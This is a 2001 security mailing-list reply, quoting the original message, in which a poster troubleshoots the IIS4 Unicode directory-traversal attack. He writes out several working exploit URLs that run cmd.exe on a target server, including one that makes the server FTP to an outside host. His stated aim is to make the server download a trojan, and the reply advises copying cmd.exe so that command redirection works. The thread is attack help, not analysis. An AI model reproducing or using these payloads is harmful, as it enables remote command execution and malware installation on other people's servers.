Re: unicode / iis4

[Optical <optical () EQUILAN NET>]

I'm not exactlly sure but I believe that the redirection problem was figured
out months ago.  If I remember correctly you need to copy cmd.exe to
something like cmd2.exe before you are able to do redirections and such.
And it would also be easier if you copied cmd.exe to something like
c:\cmd2.exe so that you have less stuff to type in ;).

----- Original Message -----
From: Mad Zigy <zigy () GLOBAL CO ZA>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Saturday, January 06, 2001 9:59 AM
Subject: unicode / iis4


> Well i have been able to use msadc2.pl yet the
> commands i give do not work. so i tried the other way
> by doing
> http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test
> .txt
> and all it did was say: The parameter is incorrect.
> so then i though maybe we cant have a > in the string
> so i found the hex of it and tried
> http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+echo+test+%
> 3e+c:\test.txt
> yet it still gave me the same: The parameter is
> incorrect.
> I have been able to make it ftp into my pc by
> http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+ftp+hostname
> but i cant make it login as i need to echo a script
> which i can run http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+ftp+-
> s:c:\ftp.txt+hostname so that it will login and
> download the exe / trojan
> Thankz zigy!